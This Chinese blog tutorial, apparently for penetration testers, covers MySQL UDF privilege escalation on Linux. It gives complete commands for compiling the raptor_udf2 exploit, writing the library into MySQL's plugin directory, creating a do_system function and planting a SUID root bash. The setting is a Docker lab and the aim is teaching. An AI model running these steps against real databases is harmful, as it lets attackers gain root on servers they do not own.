linux提权——Mysql UDF提权

最新推荐文章于 2024-08-20 18:02:14 发布
最新推荐文章于 2024-08-20 18:02:14 发布
阅读量694 收藏 8
点赞数 6
分类专栏: web渗透测试 文章标签: linux mysql adb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/137673158
版权

文章目录

UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。

提权条件:

  • 拥有mysql数据库账号,且这个账号对mysql数据库有create、insert、delete权限;
  • mysql数据库的secure_file_priv为空,这个变量主要限制load data、select * into outfil、load_file()只能在特定目录进行。

    该变量有三种情况:

    • secure_file_priv=null:所有路径不可写;
    • secure_file_priv='':所有路径可写;
    • secure_file_priv='/xxx/xxx':/xxx/xxx路径可写;
searchsploit mysql udf # 寻找mysql UDF相关的EXP
searchsploit mysql udf -m 1518.c # 将漏洞库中的1518.c下载到当前目录

在这里插入图片描述

gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。

简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,

mysql数据库是mysql的核心数据库,主要负责存储数据库的用户、权限设置、关键字等mysql自己需要使用的控制和管理信息。

在这里插入图片描述

gcc -g -c <源码文件> -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

-g:生成调试信息
-c:仅仅编译源代码,不进行链接,通常生成.o文件
-fPIC:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,
在这里插入图片描述

docker cp <宿主机文件路径> container_id:<coker容器中文件路径> # 将生成的so动态链接库文件传入docker容器内

在这里插入图片描述

mysql -u root -p # 登录mysql数据库

# 查看是否满足UDF提权的基本条件
select user(); # 查看当前用户权限
show variables like '%secure_file_priv%' # 查看mysql中secure_file_priv的值

# 写入so共享库文件路径
show variables like '%plugin%'

这里账号权限属于root权限,且secure_file_priv的值为空,意味着任何一个目录都是可写的。故满足mysql UDF提权的基本条件。
在这里插入图片描述

create table foo(line blob):  # 创建一个名为foo的数据表,有一个line列,其中的数据类型为blob。基本语法:create table table_name(columns datatype,...)
# foo在计算机编程和网络领域是一个常用的占位服务名称,本身没有任何意义;
# blob,即binary object,二进制对象,在存储二进制数据(如图像音频,UDF函数等)时,经常用这种数据类型。

insert into foo values(load_file('/tmp/raptor_udf2.so'));    # mysql插入语法:insert into table_name(column1,...) values (values1, ...)
# load_file():mysql中从本机导入文件

select * from foo into dumpfile('/usr/lib/nysql/plugin/raptor_udf2.so'); # 查询foo表中的所有数据,并将其写入/usr/lib/nysql/plugin/raptor_udf2.so
# outfile和dumpfile的区别:
# outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出;
# dumpfile只能写一行,并且输出中不存在任何格式。
# 注意:outfile导出二进制文件的时候会出错,最好用dumpfile

create function do_system returns integer soname 'raptor_udf2.so'; # 创建自定义函数
# 函数名为do_system;
# 返回值为整形,soname共享库名字为‘raptor_udf2.so’,mysql的共享库路径就是/usr/lib/mysql/plugin/

select * from mysql.func; # 查看mysql自定义函数

select do_system('cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash'); # 执行系统命令

/tmp/rootbash -p # 退出mysql连接,-p是以特权root身份启动bash.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

chown mysql:mysql <文件路径>:修改文件属主。

PT_silver
关注
专栏目录
Linux提权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 769
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了提取。
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1728
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
Mysql - UDF提权介绍
最新发布
Reset
08-20 447
Mysql 的 User Defined Functions(UDF)功能,允许用户扩展mysql的功能,通过编写自定义的函数,用户可以将复杂的逻辑封装成函数,然后在sql查询中直接使用。所以攻击者可能会尝试通过UDF提权来获取数据库的高级权限,从而执行任意代码或者敏感数据。
Linux提权mysql UDF提权
waxcj的博客
12-16 2196
linux mysql数据库提权
MySQL提权UDF提权
2301_76227305的博客
06-08 1833
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
mysql udf提权
weixin_44304678的博客
03-25 382
上传成功后,执行如下命令创建自定义函数。
Mysql数据库提权——UDF提权
cxrpty的博客
03-11 1947
实验原理:UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf, 必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能 实验条件 :1.具有mysql的root权限,且mysql以system权限运行 ...
lib_mysqludf_sys
12-22
MySQL系统命令UDF——lib_mysqludf_sys详解》 MySQL是一种广泛使用的开源关系型数据库管理系统,其功能强大,灵活性高。在实际应用中,有时我们需要执行一些操作系统级别的任务,如读取或写入文件、执行系统命令...
lib_mysqludf_ta-开源
08-05
MySQL用户自定义函数库lib_mysqludf_ta详解——开源技术分析指标的集成》 在数据库管理和数据分析领域,MySQL以其高效、稳定和易用性深受广大开发者喜爱。然而,对于金融市场的技术分析爱好者来说,直接在MySQL中...
MYSQL高版本低版本UDF提权工具
06-20
MYSQL高版本低版本UDF提权工具 很好用的UDF提权使用 有两个版本
20201231WEB渗透学习之Linux内核提权
qq_45290991的博客
01-01 909
我们都知道,如果已经获取了目标服务器(网站)的后门shell,那么我们接下啦要做的事情是什么????对,就是进程迁移(把自己的shell隐藏到一个不容易被肉鸡检测到的地方,比如说一个很深的目录下),但是要执行进程迁移,我们需要root权限,所以实际上我们应该先提升攻击者的权限,来使得我们有着更高的权限(比如说root)去操控肉鸡。在提升权限的过程中,我们常常用到一个能够和肉鸡建立实时会话的TCP工具——————Netcat。网上的教程一般都是先开篇列出来这个工具的命令,然后后面接上一些实际例子,这样有好处也
MySQL UDF 提权
small_cat's home
10-22 1945
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
MysqlUDF提权
热门推荐
内心不种满鲜花就会长满杂草
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
linux mysql udf 提权
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 977
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
Linux mysql root 提权
系统运维
12-30 224
*Usage: *$id *uid=500(raptor)gid=500(raptor)groups=500(raptor) *$gcc-g-craptor_udf.c *$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc *$mysql-uroot-p *Enterpassword: *[.....
MySQL提权——udf提权
hackzkaq的博客
04-11 6527
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值